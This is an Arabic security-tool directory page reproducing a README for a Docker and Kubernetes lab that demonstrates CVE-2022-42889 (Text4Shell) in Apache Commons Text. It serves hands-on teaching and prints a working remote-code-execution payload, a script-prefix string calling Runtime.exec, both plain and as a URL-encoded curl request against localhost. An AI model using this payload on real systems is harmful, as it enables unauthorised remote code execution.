Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
text4shell-cve-2022-42889 — مختبر Kubernetes لـ CVE-2022-42889 | Kitploit
أدوات/GitHubGitHub/devenes/text4shell-cve-2022-42889
أمن الحاوياتتحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن السحابةالتعلم والتعليممختبرات وتدريب عملي
GitHubdevenes/text4shell-cve-2022-42889

text4shell-cve-2022-42889

مختبر Kubernetes لـ CVE-2022-42889

عرض المستودع
21منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Text4Shell CVE-2022-42889

مختبر Docker لـ CVE-2022-42889

يمكنك إما بناء صورة Docker محليًا أو سحب الصورة من Docker Hub وتشغيل الحاوية.

استنساخ المستودع

root@kitploit:~
git clone https://github.com/devenes/text4shell-cve-2022-42889.git

بناء صورة Docker محليًا

root@kitploit:~
docker build --tag=text4shell .

تشغيل حاوية Docker

root@kitploit:~
docker run -d --rm -p 8080:8080 text4shell

أو سحب الصورة من Docker Hub وتشغيل الحاوية

root@kitploit:~
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0

اختبار التطبيق عن طريق تمرير نص إلى معامل search:

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>
  • يمكن تنفيذ الهجوم عن طريق تمرير نص ${prefix:name} حيث يكون البادئة هي البحث المذكور أعلاه:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

هجوم باستخدام curl:

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
  • يمكنك أيضًا تجربة استخدام البادئات dns أو url

الحصول على معرف الحاوية

root@kitploit:~
docker container ls

الدخول إلى الحاوية

root@kitploit:~
docker exec -it <container_id> bash

التحقق من نجاح هجوم RCE

  • يجب أن ترى ملفًا باسم foo تم إنشاؤه في دليل /tmp:
root@kitploit:~
ls /tmp/

يمكنك إيقاف الحاوية عن طريق تشغيل الأمر التالي

root@kitploit:~
docker container stop <container_id>

مختبر Kubernetes لـ CVE-2022-42889

الانتقال إلى دليل kubernetes واتباع التعليمات في ملف README.md.

root@kitploit:~
cd kubernetes

إنشاء كتلة kind

root@kitploit:~
kind create cluster --config kind-config.yaml

نشر التطبيق الضعيف على الكتلة

root@kitploit:~
kubectl apply -f deployment.yaml

إنشاء خدمة لعرض التطبيق

root@kitploit:~
kubectl apply -f service.yaml

مهاجمة التطبيق الضعيف باستخدام curl

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

الحصول على اسم البود باستخدام kubectl get pods

root@kitploit:~
kubectl get pods

الدخول إلى البود باستخدام kubectl exec

root@kitploit:~
kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash

التحقق من نجاح الهجوم

root@kitploit:~
ls /tmp/ | grep foo

يمكنك العثور على البرنامج التعليمي المفصل في دورة Udemy الخاصة بي هنا


المراجع:

  • https://github.com/karthikuj/cve-2022-42889-text4shell-docker
  • https://www.docker.com/blog/security-advisory-cve-2022-42889-text4shell/
  • https://unifiedguru.com/security-advisory-cve-2022-42889-text4shell-docker/
  • https://medium.com/mii-cybersec/cve-2022-42889-text4shell-vulnerability-17b703a48dcd
تنزيل الأداة